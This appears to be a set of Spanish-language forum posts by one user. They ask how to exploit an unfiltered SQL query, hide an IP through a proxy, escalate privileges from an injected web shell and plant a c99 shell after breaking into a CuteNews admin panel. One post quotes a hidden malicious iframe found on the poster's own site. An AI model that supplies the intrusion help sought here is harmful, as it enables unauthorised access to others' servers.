Temas

Bueno amigos tengo la siguiente duda.

tengo esta sentencia sql

Código [Seleccionar] Expandir

$thefaq=mysql_query("SELECT question,answer,lasteditedby,lastedit FROM faq WHERE id='$faqid'");

$faq=mysql_fetch_array($thefaq);

y para desplegar la salida html realiza la verificacion

Código [Seleccionar] Expandir

if($faq[question]){

..... sale el HTML

}

como podria borrar datos o bien como podria ingresar una shell.

sabiendo que no el codigo entra limpio sin filtro de magic quotes etc.

Bueno amigos lo que necesito es ver el codigo fuente de la web, pero que este nunca detecte mi real ip, es por eso que requiero de cURL ... tengo un codigo pero no me funciona como espero.

Código (php) [Seleccionar] Expandir


<?php
$ch = curl_init('http://www.miip.cl/');
curl_setopt($ch, curlOPT_HTTPproxyTUNNEL, 1);
curl_setopt($ch, curlOPT_proxy, '200.113.165.54:8080');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$page = curl_exec($ch);
curl_close($ch);
 
print $page;
?>


no me cambia la ip ....

alguien tiene un script similar ?


Gracias.

Bueno amigos lo que pasa es que estoy programando un panel de control y estoy tomando todos los cuidados posibles es por ello que quiero hacer la siguiente pregunta.

¿Es posible modificar el valor de las $_SESSION?

porque lo pregunto porque si yo en panel guardo el nivel del usuario

1 = admin
2 = moderador
3 = cliente

$_SESSION['nivel'] = 1;

..... alguien podria modificar su nivel y paff me caga XD

Bueno realmente he buscado informacion sobre esto en google

http://x8n.ru:8080/index.php

y sale simplemente que es un malware...

-------

Les cuento tengo un sitio web y google lo ha bloqueado porque me dice que es unsitio atacante, cosa que no lo es. Pero revisando mis archivos index.php y varios de mis otros index tenian dentro un <iframe src="http://x8n.ru:8080/index.php></iframe> en hidden y bueno obviamente lo borre y todo, pero mi preguntas son.

¿como llego hay?
¿porque afecta mis archivo index?
¿como puedo solucionar esto?


Gracias.

[126]

Bueno lo que pasa es que tengo una shell injectada pero lo malo es que no he podido hacer mucho ya que el panel de control que usa el servidor es Ferozo y cual deja bastante limitado todo, a tal punto que cualquier comando que quiera ejecutar me lanza como resultado 126, no puedo ejecutar comandos en el servidor....

¿Encontonces como podre escalar privilegios?

¿Que me recomiendan?


Gracias.

Hola buenas ya he podido entrar al admin del cutenews usando dos exploit, uno que me buscar el nick del admin y otro me mostrara el hash en md5 y bueno pude entrar pero ahora quiero tratar de ir por mas pero no se me ocurre como poder escalar mas privilegios, quiero de alguna manera injectar una shell c99 o algo para poder tener un poco mas de control sobre el servidor, y hay esta la pregunta...


¿Se puede escalar mas privilegios por medio de Cutenew o bien injectar una shell?

Bueno lo que pasa es que tengo un host con cpanel, todo es bastante seguro pero ahora estoy viendo el tema de los rfi defeat y todo el tema y bueno puse una c99.txt en mi servidor y puedo ver casi todo menos algunos directorios en donde solo tiene permisos el administrador, mi consulta es... ¿Es posible escalar privilegios por medio de la shell 99.txt?, o es posible cambiar los permisos de los directorios.